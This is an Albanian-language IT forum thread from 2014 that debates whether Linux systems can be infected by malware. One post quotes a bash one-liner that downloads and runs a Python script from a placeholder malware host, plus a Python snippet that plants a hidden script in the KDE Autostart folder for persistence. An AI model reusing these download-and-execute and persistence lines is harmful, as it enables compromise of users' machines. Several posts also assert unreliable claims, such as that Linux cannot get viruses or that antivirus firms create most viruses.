1. Përshëndetje dhe mirësevini në forumin e Itshqip.com
  Nëse akoma nuk jeni pjesë e IT komunitetit më të madhë Shqiptarë nga fusha e Teknologjisë Informative, ju ftojmë që të bëheni pjesë e këtij komuniteti që tani duke u regjistruar këtu - procedura është shumë e thjeshtë dhe e lehtë. Gjithashtu ju mund të regjistroheni edhe përmes rrjetit social Facebook, Twitter, Google+.

Ndihmë SISTEMI LINUX

Tema tek 'Pyetje dhe Përgjigje' e hapur nga BAVAREZI, 13 Dhjetor 2014.

 1. BAVAREZI

  BAVAREZI Anëtar

  Postimet:
  1
  Pëlqimet:
  0
  Pikë nga trofetë:
  1
  KUSH ME NDIHMON ME INFORMACION MBI LINUX SI DHE APLIKIMI I TIJ NE KOMPANITE SHQIPTARE
   
 2. Gr@1ti

  [email protected] Anëtar i Njohur

  Postimet:
  848
  Pëlqimet:
  146
  Pikë nga trofetë:
  88
  Code:
  http://www.albasoul.com/modules.php?op=modload&name=News&file=article&sid=259
  Code:
  http://www.telegrafi.com/teknologji/cfare-eshte-linux-23-26.html
   
 3. sg1

  sg1 Haveibeenpwned ?! Staff Member IT Staff

  Postimet:
  4,635
  Pëlqimet:
  953
  Pikë nga trofetë:
  343
  Linuxi eshte sistem qe me nje fjale quhet Open Source, qe do te thote se nuk ka mundesi qe nje sitem linux me u infektu me virus, e di qe me heret disa banka ne Kosove kane perdorur serveret me sistem linux mirpo per tash ne kohen e fundit nuk e di se me cfar sisteme aplikojn punen e tyre ndersa per kompanit tjera ne Kosove mendoi qe jane 0.01% qe posedojn linux e kam fjalen per kompani dhe jo per Persona individual.

  Mire u ndegjofshim.
   
 4. Zyklon

  Zyklon Bitcoiner

  Postimet:
  3,500
  Pëlqimet:
  344
  Pikë nga trofetë:
  253
  Shume gabim, pra sipas juve sepse eshte Open Source do te thote: nuk mund te infektohet me virus ?
  Linux mund te infektohet me virus por gjasat jane shume me te vogla te infektohet se sa nje Windows ? Pse ? Pergjigjja: Linux perdoret shume me pak ne krahasim me Windows e kam fjalen per PC jo servera, dhe nje logjike e thjesht nje hacker motivohet me shume te shkruaj nje virus qe sulmon Windows maqinat se sa linux sepse poenta e tij eshte qe sa me shume te infektoj me ate virus.
   
  Fannol Gashi dhe ﴾.﴿ pëlqejnë postimin.
 5. sg1

  sg1 Haveibeenpwned ?! Staff Member IT Staff

  Postimet:
  4,635
  Pëlqimet:
  953
  Pikë nga trofetë:
  343
  Nese je ndjekes per kohe te gjate i linuxit, ubuntus, windowsit, me trego nje lajm qe ke ndegjuar ndonjeher qe nje server me posedim linux eshte infektuar me trojan horse ?

  Nuk e kam cekur qe nje sistem linux 100% eshte i sigurt por e kam cekur qe nuk ka mundesi infektimi me virus, qe nenkupton se si ai perdorues apo drejtues i atij serveri e mban serverin.

  Nese nuk din me e drejtu nje server linux nje person qe eshte si menagjer i serverit shume leht mundet me pas pasoja nese ai server ka multiple users te krijuar qe mundet nga ndonje x individ me e marr ate posedim te atij serveri ne dore por jo duke perdorur keylogg apo bootnet.

  Keshtu qe prap se prap qendroi pas asaj se sistemi linux eshte me i sigurti ne bote nese eshte fjala per OS.

  Ndersa nje replik per pergjigjen tende per virusa, nuk eshte problemi qe linux nuk ka perdorues apo nuk ka servera qe perdorin linux por gjasat jane minimale nje krijues me kriju nje trojan horse per linux ndersa per windows e dijm te gjithe sa trojan horse leshohen cdo 48/h.
  Mire u ndegjofshim.
   
 6. Zyklon

  Zyklon Bitcoiner

  Postimet:
  3,500
  Pëlqimet:
  344
  Pikë nga trofetë:
  253
  https://blog.avast.com/2013/08/27/linux-trojan-hand-of-thief-ungloved/

  Po cka nese eshte ekspert i konfigurimit te nje web serveri me Linux, por dikush perdore nje bug qe ka qene dhe ende eshte neper Linux servera ky bug, nuk ka nevoj per keyloger as Trojan Horse se kto viruse ma shume perdoren prej ktyne adoleshentave.

  http://arstechnica.com/security/201...big-security-hole-on-anything-with-nix-in-it/
  Keto bugs shfrytezohen me vite pa dale ne shesh, keto mund te jene edhe te perdorura nga agjensione shteterore spiuni si NSA etj,

  Gjithashtu edhe une, por jo siq tha ne postin e pare "nuk ka mundesi me u infektu me virus" sepse siq po shihen mundesit ekzistojn, pa marre parasysh sa minimale jane ato nuk mund te themi qe ska mundesi.

  Per Linux webserver, krijohen viruse te avansuara dhe shfrytezohen per nje kohe te gjate pa u zbuluar dhe duke u perdorur nga shtetet, pasi dihet qe shtetet e medha bejn edhe lufta virtuale ne mes veti por edhe dolen ne shesh punet e NSA qe bashkpunojn me kompani te medha edhe pa deshiren e tyre si Google, Apple etj kshtu qe nuk eshte puna e nje cracker-i me kodu nje virus RAT/keylogger etj per Linux, por hyn ne loje ketu 'lojtar' me te medhenj.
  https://blog.avast.com/2013/08/27/linux-trojan-hand-of-thief-ungloved/
  http://www.pcworld.com/article/2859122/your-linux-pc-isnt-as-secure-as-you-think-it-is.html
  https://securelist.com/blog/research/67962/the-penquin-turla-2/
  Shellshock bug
  http://arstechnica.com/security/201...big-security-hole-on-anything-with-nix-in-it/
  Ne fund them se nje *nix server eshte me i sigurte se nje Windows server, por mos te themi se eshte i sigurte (kur thua i sigurte, me kete fjale nenkuptohet 100% i sigurte)
   
 7. WhiteLine

  WhiteLine Anëtar i Njohur

  Postimet:
  730
  Pëlqimet:
  59
  Pikë nga trofetë:
  58
  Me 1 fjale, virusat e sistemit operativ windows nuk kane mundesi mu transferu ne sistemin operativ linux, krejtesisht linuxi eshte platforma tjeter dhe shume rralle apo gati kurr skemi ni per ndonje virus ne sistemin operativ linux, poashtu virusat ne linux nuk munden me bo gjithcka me fshi ndonje file te systemit sikurse ne sistemin operativ windows me pak fjale nuk kane autorizim me bo ate.
  Pershendetje.
   
 8. sg1

  sg1 Haveibeenpwned ?! Staff Member IT Staff

  Postimet:
  4,635
  Pëlqimet:
  953
  Pikë nga trofetë:
  343
  :D.

  Spari tu kisha lut mos me u bazu ne faqe interneti te cilat prodhojn anti-virus si p.sh avast blog e thojn qe u ba kjo u ba ajo qe me shit produktin e vet.

  Thjesht po debatojm pasi qe nuk po dalim jasht teme qe e ka kerkuar personi.

  Kur shkruajm ne shume poste ngutemi sepse nuk e kemi kohen aq te lire, une kam thene siper nuk ka mundesi me u infektu me virus, gje qe nenkupton virus dhe jo bugs,
  Nuk e them kete gje rastesisht por e them pasi qe kam qene njohes i mire i linuxit (mos me ia rrit mendjen vehtes) andaj e di sa jane mundesit qe me perdor nje bootnet per tek viktimat qe do me thene ke mundesi minimale krahasuar me nje OS tjeter si p.sh windows.

  Sigurisht edhe ti e din qe nje kompjuter qe ka linux ke mundesi te pakta per ta ``kapur`` si viktim me remote... vetem ne rast se personi ka lene hapur ndonje port per multiple users se ndryshe nuk ka gjasa.

  Nese flasim per NSA, CIA, etj ateher dalim jasht teme krejt sepse nuk ia vlen nje debat nga ``peshqi te vegjel, per Peshkaqena``.

  Nese po thua krijohen virusa te avansuara me trego si mund te funksionon nje virus i avancuar ne nje open source ?

  Qe po e marrim nje shembull, ne Linux kemi shume versione Bt, Kali, etj me te gjitha keto mundesh me bo ddos apo attack apo wep wpa crack mirpo nuk mundesh me perdor asnjerin per te infektuar kompjuter tjeter, nuk e di sa po kuptohemi.

  90% te virusave per windows krijohen nga vet persona qe shesin produkte anti-viruse per perfitime dhe jo qe deshirojn mbrojtjen falas te kompjutereve.

  Njeher para disa vite ka qene nje intervist e Bill Gates, qe e kan quajtur botnet i Linux nese nuk e kam harruar, gje qe kishte te beje me krijimin e trojans per linux mirpo nuk ka dalur ndonje trojan qe te bej nje demtim ne nje linux sistem thjesht kur beje scan kan qene si trojan disa shkronja te nderlidhura si p.sh ksapdd , xdxd e kshtu me radhe por jo dicka me shume.

  Cdo individ ne linux 99% te programeve qe perdor mundet me i pas 90% nen kontrollin e vet pasi qe jane open source dhe lejohet modifikim andaj nuk i leverdis kompanit qe te krijojn softwares apo antivirus qe te mund te modifikohen nga userat :D.

  Nuk po e zgjas me shume, vec deshta me e kjartesu qe garantoi ne te gjitha menyrat qe nje kompjuter qe ka sistem linux nuk merr virus, nese ben scan dhe te gjen ndonje lloj trojan thjesht do dalin shkronja siq e ceka me lart por jo dicka qe mundet serizisht me e demtu sistemin,

  Mire u ndegjofshim.
   
  WhiteLine pëlqen postimin.
 9. Fannol Gashi

  Fannol Gashi SysAdmin Staff Member Administrator

  Postimet:
  3,255
  Pëlqimet:
  1,425
  Pikë nga trofetë:
  343
  Do te kyqem edhe une me e jep nje mendim timin. Por jo tash se jame ne pune edhe nuk kam kohe ne shkru gjate.

  Por ne mbremje do e jap mendimin tim.

  Klm

  Sent from my GT-I9192
   
 10. Zyklon

  Zyklon Bitcoiner

  Postimet:
  3,500
  Pëlqimet:
  344
  Pikë nga trofetë:
  253
  Me kete fjali u cudita edhe fillova kete muhabet, edhe prape mendoj qe ketu cka ke thane eshte gabim se ato bugs edhe ato linqe qe i postova dhe nuk kerkova shume nuk gjeta se tash edhe burimin e lajmit po e dyshon po sidoqofte, por nje gje besoj pajtohemi po edhe nese jo ska problem qe:
  Ska OS as Linux a as Windows qe eshte i sigurte dhe nuk ka mundesi te infektohet apo te gjendet ndonje vrime dhe te shfrytezohet ajo vrim (vuln.).

  Kshtu qe konkludimi im i krejt ktij muhabeti eshte qe Linux eshte me i sigurti, por jo i pathyeshem vete faktet e bugs qe u zbuluan kohet e fundit tregojn qe kemi menduar qe Linux eshte i pathyeshem por jo, si shellshock dhe OpenSSL (jo OS por tool qe u perdore prej shume webserverave te Linux) e ku me dite edhe sa vuln. eksistojn edhe sot edhe shfrytezohen dhe behen publik pas disa viteve.

  Ne fund ky eshte mendimi im, dhe besoj i fundit ne kete teme pasi mos te perseritna...
   
  sg1 pëlqen postimin.
 11. Fannol Gashi

  Fannol Gashi SysAdmin Staff Member Administrator

  Postimet:
  3,255
  Pëlqimet:
  1,425
  Pikë nga trofetë:
  343
  Gjeta pak kohe qe ta jap edhe mendimin tim, ne lidhje me kete teme se smujta me u duru deri mbramje :p.

  Fillimisht po e ceki qe skam njohuri ne LINUX (me punu me to me kry pune ditore, ndoshta gjerat elementare po (clicking, double clicking, ... :p, por jo diqka te avancuar ).

  Por thjesht nga logjika se si jane te ndertuar sistemet operative mundem me e jap nje pergjigjje (qe eshte mendimi im, dhe nuk dmth qe te jete qashtu).

  @sg1 : Nuk kisha me thon qe nje linux nuk mundet me u infektu, virusat qe jane ne windows normal qe nuk funksionojn ne linux, sepse hapen si tekst i thjesht me shkronja pldh qysh e ceke ti (ksapdd, xdxd ....) arsyeja e vetme eshte qe ate tip te fajllit qe eshte i krijuar per nje file sistem tjeter (siq eshte NTFS) nuk mundet me interpretu thejsht smundet me e lexu qe me ekzekutu. Por kjo nuk dmth qe smunden me u kriju fajlla te demshem (malware) qe me funksionu me kry pune edhe ne linux.

  Malware (ku ne kete hyjne virusat, trojanhorse etj..) eshte thjesht nje file qe ekzekutohet (Windows .exe .bat ... ose ndonje tip te fajllit tjeter) qe kryen disa pune te caktuara ku sistemi operativ i njeh ato komanda edhe nese ekzekutohen kryejn pune te caktuara << mos me keqkuptoni se spo kam deshire tju mesoj se cka eshte virusi por thjesht me e analizu qe me jep nje pergjigjje te bazum ne fakte.

  Ku te njejten forme mundet me u kriju edhe per linux psh tipi i fajllit .sh (edhe pse aty mdoket cdo file ka mundesi me u ekzekutu).

  Tash nese e marrim si virus (po e shkruaj pseudocode ne gjuhen time :p ) kete lloj fajlli:
  Get All Disk Drives (partitions & Mapped Drives) | Delete ALL *.*

  Mundet e njejta me u shkru ne linux:
  Get All Partitions & Mount Points (qe mundet me qene network paths) | Delete ALL *.*

  Nga ky shembull une e shoh qe mundet mu bo ne keto dy sisteme operative nje virus i tille edhe me bo deme.

  Gjithashtu u permend qe nese ka hapur ndonje port at'her mundet me u infektu edhe me u kontrollu nga largesia. Hmm per kete edhe ne Windows nuk eshte qashtu veq hajt me e leshu virusin edhe me u infektu. Edhe aty jane portet e mbyllura dhe hapen vetem nese instalohet ndonje servis qe ndegjon ne ato porte (po flas per versionet e reja).

  Gjithashtu prej Windows Vista+ kur eshte implementu UAC, lirisht muna me thon qe infektimi me virusa eshte zvogelu ne mase te madhe (sepse dihet qe virusat shfrytezojn te drejtat qe i ka useri qe eshte i loguar per momentin) por pasi eshte implementu UAC at'her eshte tjeter sepse cdo here qe nje user logohet gjenerohen dy tokena (njeri limited useri, tjeteri administrative rights) qe eshte njejt si ne Linux (sudo).

  Dhe prap mendimi im eshte qe pse nuk ka virusa te shumte ne Linux eshte: Vetem popullariteti siq e tha edhe @Zyklon ku me nje virus me mire ti infektosh 10milion PC se sa 100 dhe jo sepse nuk munden me u infektu.

  Kaloni mire.  Sent from my GT-I9192
   
  Last edited: 15 Dhjetor 2014
  sg1 dhe shkelqim12 pëlqejnë postimin.
 12. sg1

  sg1 Haveibeenpwned ?! Staff Member IT Staff

  Postimet:
  4,635
  Pëlqimet:
  953
  Pikë nga trofetë:
  343
  Si fund mos me e zgjat se vec shkojn duke u perseritur fjalet,

  fG po tregon qe nuk je perdorues i Linuxit dhe e spjegove tamam ne gjuhen e informatikes dhe ne menyre logjike.

  Si citim kisha me e shtu qe ne Linux logjika per funksionimin e nje virusi nuk funksionon, kete gje mundet me ta deshmu ndoshta edhe Zykloni pasi qe ai sigurisht eshte perdorues i Linuxit.

  E kam provuar kete gje vite me heret ne linux merre cfaredo trojani mundohu me e ekzekutu ate komand ta kthen ne germa siq e ceka siper.

  Nuk e tham kete gje me te ndegjuara apo me te lexuara por e them me te testuar.

  Zyklon nuk pres me ba debat edhe me shume, nje gje kisha desht me ta shtu qe lirisht mundem me thene 100% eshte e sakt, ato bugs qe i zbuluan ne kohet e fundit ne sisteme apo servera linux, nuk kan qene fare bugs por aty kane qene bugs x personat qe i kane mirembajtur serveret.

  Vec nje gje kuptojeni, nese sipas juve nuk kan llogari me kriju nje virus per linux por kan llogari me kriju nje virus per windows os sepse infektojn me miliona pc.

  Ne kohen qe jemi tani 99% e njerzve perdorin paisje iphone android tablet etj.

  E keni pa qe ne Iphone ka pasur mjaft hack permes bugs whatsapp etj.

  Ne nje samsung galaxy rooted mundeni lirisht me e instalu Linux BackTrack apo ndonje tjeter version por provojeni nese mundeni me kriju bugs per apo me gjet bugs qe do mundeni me infektu nje telefon tjeter dhe do bindeni edhe vet :D.

  Nuk e mohoi qe ndoshta ka person qe mundet me kriju bash nje malware dhe me i ba viktimes dem pa miratimin e viktimes, por ai neri ne gjithe boten do quhej botnet.

  Mire u ndegjofshim.
   
 13. Fannol Gashi

  Fannol Gashi SysAdmin Staff Member Administrator

  Postimet:
  3,255
  Pëlqimet:
  1,425
  Pikë nga trofetë:
  343
  Qaj trojan qe e permende, a funksionon ne Windows? Dmth me e infektu nje kompjuter ne Windows?

  Ndersa ti ne Linux e ke provu edhe nuk funksionon, a eshte kjo qe the se ndoshta e kam keqkuptu?

  Thnx

  Sent from my GT-I9192
   
 14. sg1

  sg1 Haveibeenpwned ?! Staff Member IT Staff

  Postimet:
  4,635
  Pëlqimet:
  953
  Pikë nga trofetë:
  343
  Po ne ate kohe ne windows ka funksionu dhe i vetmi ka qene kaspersky antivirus nese nuk e gaboj ka qene versioni 6.0 qe e ka diktu,

  Po ashtu edhe me nje botnet ne windows ia qojshe viktimes pa problem e merrke dhe as qe ia diktojke asnjeri virus i asaj kohe, ne linux as qe mujshe me e ekzekutu komanden permes atij linku.

  Andaj une per veti cuditem nese dikush me thot perdori linux dhe sistemin e kam te infektuar me nje trojan :S.
   
 15. Fannol Gashi

  Fannol Gashi SysAdmin Staff Member Administrator

  Postimet:
  3,255
  Pëlqimet:
  1,425
  Pikë nga trofetë:
  343
  @sg1 :: Ndoshta edhe jam gabim, spo thom qe 100% cka them eshte e vertet, por me logjike te shendosh nuk ka shanca qe Linux OS mos me mujt mu infektu. Normal duhet edhe edukim i shfrytezuesit, por thjesht nuk eshte qe nuk bohet. Mu dergoma at file cka ke BotNet apo diqka tjeter edhe muna me provu, por nuk muna mu infektu, sepse i kam disa masa te sigurise te cilat jane gjenerale edhe nuk funksionojn, nuk them qe smundet me mu infektu kompjuteri por, mundohem qe mos me ndodh ajo. Thjesht perdori Standard User, cdo her qe duhet me ndryshu gjendjen e sistemit operativ (instalim,ri-konfigurim etj..) e perdori Run as administrator, ja jap passin edhe vahzdon puna, perdori Antivirus, AntiMalware, e kontrolloj shpesh here Serviset,Proceset se mos ka diqka te dyshimt, i kontrolloj portet se cilat jane te hapura ne kompjuterin tim, ne cfare IP-ja jane te hapura sesionet etj.. << Sjom GEEK per keto, por vetem i ceka disa :rolleyes:

  Ndoshta nuk po kuptohemi por >> Ai file qe e infekton Micorosft OS nuk ka mundesi me ta infektu Linuxin sepse nuk ekzekutohet thjesht smundet me e lexu, apo ndoshta edhe nuk jam ka kuptoj se cka po deshiron te shkruash.

  Nuk e kam per qellim qe ne fund te shkruaj "" QE NUK E DITE A PE SHEH, UNE JOM I MENQUM "" - pa keqkuptime (se ndoshta mendon qe po te kundershtoj, me qellim)
  Edhe une si krejt antaret tjere, jam regjistru qe te marr ndihma, por edhe t'ju ndihmoj me aq dije sa kam, andaj kam deshire edhe une te mesoj. Edhe me besoni shume gjera i kam mesuar nga ITSHQIP, sinqerisht disa gjera qe ndoshta jane elementare, i kam mesuar ketu dhe nuk mu ka dasht me hi me shfletu internet 30min per me gjet ni informat, por e kam gjet te gatshme ketu. Edhe pse disa mesime qe i shkruajn tjeret, 90% te rasteve i lexoj te gjitha sepse mundem te mesoj edhe une diqka.

  Tash tu shfletu e gjeta kete teme, ndoshta edhe e ke lexu, edhe pse kish kogja shume tekst po ja vlejti dhe eshte e njejta pergjigjje/IDE qe e kam shkrujt me larte: www.geekzone.co.nz/foobar/6229

  Nga ajo faqe, nese e marrim kete code:
  Code:
  % bash -c "curl http://www.some_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py" 
  OSE KETE
  Code:
    import os
    uname = os.getlogin()
    drop_dir = “/home/%s/.kde/Autostart” % uname)
    os.makedirs(drop_dir)
    os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir+“/s.py")
  Edhe i ekzekutoj ne Windows psh: CMD ose Powershell, ose edhe e instalojm python-in edhe e ekzekutojm. Ska me jep kurfar efekte se forma e brendshme qe osht shkru nuk mundet mu ekzekutu nga Windowsi. Kjo eshte e njejt sikur me ma dhon mu ni tekst ne gjuhen Kineze qe tregon qysh me i bo ni pune, thjesht sdi me e bo se sdi me e lexu, ndoshta edhe me kon ENGLISH TRANSLIRETATION (psh kete text: Nǐ zài gànshénme e lexoj por se kuptoj. E njejta eshte edhe ne WINDOWS<>LINUX.

  Prap po e them edhe ndoshta jam gabim, por per ate po debatoj sepse kam deshire te mesoj.
  Por kisha pas deshire me e lexu tekstin nga websajti qe ta tregova, sepse eshte e njejta logjike qe po e permendi edhe une ketu. Qe nese shkruhet nje file qe ekzekutohet ne ate menyre qe sistemi operativ mundet me e kuptu edhe me ekzekutu, at'her mundesh me kriju nje malware edhe thjesht ai kompjuter infektohet.

  Te pershendes.
   
  Last edited: 15 Dhjetor 2014
 16. sg1

  sg1 Haveibeenpwned ?! Staff Member IT Staff

  Postimet:
  4,635
  Pëlqimet:
  953
  Pikë nga trofetë:
  343
  hahahahahaha jo nuk jemi kah kuptohemi me duket.

  Sigurisht qe e dijm qe nje .exe bat i Windows OS smundesh me e ekzekutu ne linux, taman puna me e provu ate gje, mirpo e kam fjalen i njejti trojan i asaj kohe ka qene per linux dhe per os dhe nese nuk e gaboi e ka pasur emrin zeus apo zeobot keshtu dicka qe ka qene per infektim te windows os e po ashtu edhe per linux por ne linux nuk ka pasur sukses aspak ndersa pak me vone eshte rikthyer ne nje file ku dergohej ne email te viktimes dhe nese viktima e hapte ate email, automatikisht direktoriumet e hard diskut i shkaterronte ku nuk mujshe me perdor as data recovery as asgje ( e kam fjalen nese emaili hapej ne nje pc qe kishte windows os dhe jo linux os)

  Spo di si me e skjaru vec nje gje rreth infektimit:
  Nje linux sistem smundet me u infektu aq leht sepse shumica e fileve jane rooted nga vet personi ndersa jane vetem read only nga tjert usera keshtu qe virusi smundet me demtu dicka.

  Besoi qe e kjartesova qe te kuptohet me leht.

  Ate file te infektuar nuk e kam sepse po flas per vitin 2007 apo 2008 ndoshta pak si larg, ndersa nuk po them qe nuk kan siguri sistemet e reja te windowsit mirpo per tu infektuar infektohen me leht :S.
   
 17. Tanni

  Tanni Anëtar i Njohur

  Postimet:
  811
  Pëlqimet:
  103
  Pikë nga trofetë:
  73
  Po nderhy pak edhe pse jasht temes. Nuk ka OS qe nuk mundet me u infektu me virusa apo qfardo lloj bug (kto e tham). sg1 spo du mu bo i tepert nket teme po ti po thu qe ni trojan nuk funksionon ne linux, kjo po i bje njejte sikur me marr nje shell ose "virus" pe quajm te krijuar ne linux edhe me ekzekutu ate ne windows dhe sigurisht qe nuk do te jepte kurrfare efekti. Sikur me marr nje aplikacion te android .apk edhe me u mundu me ekzekutu ne IOS dhe anasjelltas. Kto jon krejt OS te ndryshme edhe normal qe aplikacionet e tyne nuk punojne tek njera-tjetra. Sa per Linux une kam shfrytezu ni kohe BT, edhe ke mund p.sh me kriju nje 'malware' pe quaj qe me i hap portet e atij pc ose me ekzekutu naj komand tjeter ne PC-ne e viktimes. E njejta vlen edhe per webfaqe linqet qe permbajn virusa , patjeter as ato nuk ekzekutohen sepse ato jan kriju per windows dhe jo per linux. Nuk jom shum i sigurt veq jan shume te rralle ata njerez qe e perdorin ne shtepi OS Linux per pune te perditshme, vetem per servera dhe pune te tjera. Andaj sot me shume krijohen viruse per Windows sepse ka me se shumti perdorues edhe hackeret kane qef me ja marr gjithkujt te dhenat personale.
  Pershendetje
   
 18. meteora

  meteora <Hello World> Staff Member IT Staff

  Postimet:
  1,438
  Pëlqimet:
  81
  Pikë nga trofetë:
  78
  Djema jeni ti keqkuptu pak do sene .

  Edhe une si Linux user po kyqna ntem . Nje perdorus i Linuxit me njohuri mesatare ski shanca me infektu me qfardo lloj virusi .Mundet mu kriju virusi per Linux asht e vertet!! ama problemi ma i madh asht qysh mi shti mu egzekutu ato , ska qat ban nese nuk e ekgzekuton si "sudo" , pra me nje overview tvogel nfajlla e sheh qe nuk jan dosje te sigurta nuk e egzekuton dhe e fshin .

  Tjeter asht ne windows , instaloj ndesh antivirus ndesh qadush , dhe nje trojan ose qadush tjeter beje FUD i avansuar dergoje te viktima si imazh apo qfar do ajo ka shanc mu egzekutu edhe si standard user ,nuk e di tani per tani a vlejn kto metoda ama kshtut ka qen .Ku me bash ta ka fshi kreit te dhenat ne HDD ,etj .

  Pra nwindows egzekutohet pa leje ,dhe ti se veren fare .Kurse nLinux pa aprovimin tend skan qat bojn , tu e marr parasysh qe shumica e perdorusve ne Linux jan advanced at her @sg1 e ka mir qe nuk infektohen .

  Mir e that qe kompanit e antivirusav e bojn kreit ket politiken e virusav , vet krijojn vet "kinse detektojn" , e ceka ma lart qe njohurit e perdorusve te Linux npergjithsi jan me te avansuara andaj kompanit nuk kan interes qe te mirren me ta , pra egiztojn shanca minimale dhe nuk e kan per target perdorust e Linux .

  Kurse me kta "Hakerat" qe kinse nuk bojn virusa per Linux sepse ka pak perdorus , sipas meje kjo nuk vlen , se nLinux i kan peshqit e mdhaj , shumica qe jan perdorus Linux perdorin pagesat online sepse kan njohuri , kurse as gjysma e win userave nuk din me ba pagesa online .Pra sipas meje kreit kto dallavere i bojn kompanit e antivirusave dhe qeverit .

  Sa i perket temes qe u hap , fatkeqesisht implementimi i tij ne kompanit Shqiptare asht per te ardh keq , lirisht mundem me than qe kompanit se perdorin fare , perpos si persona individ .
  Dhe nje numer bukur i madh femijesh e perdorin qe nuk ja kan iden se qfar jan tu ba , thjesht i din 2-3 komanda per instalim dhe e titullojn veten "advanced user".
   
 19. Fannol Gashi

  Fannol Gashi SysAdmin Staff Member Administrator

  Postimet:
  3,255
  Pëlqimet:
  1,425
  Pikë nga trofetë:
  343
  Lol shume logjike interesante ke perdor qe nuk eshte e vertet.

  Nese jo shumica po edhe nese 100% linux users bojn pagesa online edhe veq 10% te windows users bojn pagesa online ather i bjen qe windows users ka dikun 4-5here ma shume shfrytezues qe bejne pagesa online sa sa linux users: kjo eshte matematik e thjesht, andaj nuk eshte e vertet ajo qe thua.

  Ajo metoda qe e permende ne sistemet operative prej win vista+ eshte me e sigurt pasi perdoret UAC qysh e kom permend. Qe eshte e njejta ide sikurse me sudo.

  Sent from my GT-I9192
   
  Tanni dhe Zyklon pëlqejnë postimin.
 20. VaLoN

  VaLoN Co-Founder Staff Member Administrator

  Postimet:
  841
  Pëlqimet:
  347
  Pikë nga trofetë:
  208
  Nashta tema ish dasht mu zhvillu ne nje dimension tjeter. Se sa targetohen sitemet operative nga viruset, cili me pak e cili me shume. Se per qe infektohen kompjuterat me qdo lloje sistemi operative ajo eshte pune e kryer se nuk ka kurfare logjike me mohu nje fakt te tille. Ata qe krijojne viruse targetojne personat e thjeshte, targetojne ate qe perdoret me shume dhe pse jo ajo qe eshte me pagese, prandaj dhe ka me shume viruse per windows se po te perdornin linux ata persona qe ceka atehere ju siguroje qe kishe me pas plot viruse. Gjithashtu edhe ata qe perdorin linux kane me teper njohuri se personat e zakonshum qe perdorin windows dhe shume trika nuk i pranojne.

  Per fund :p: Nese sot me tere keto kompani antivirusesh, me tere keto miliarda euro te shpenzuara per siguri arrijne qe te kete viruse ne windows os qe nuk zbulohen prej tyre, athere si eshte e mundshme qe infektimi i nje sistemi operativ tjeter te jete i pamundshem. Ska logjike.
  Ju pershendese.
   
  Last edited: 16 Dhjetor 2014
  meteora, Fannol Gashi, Tanni dhe 1 anëtarë tjetër pëlqejnë postimin.

Shpërndaje faqen

Loading...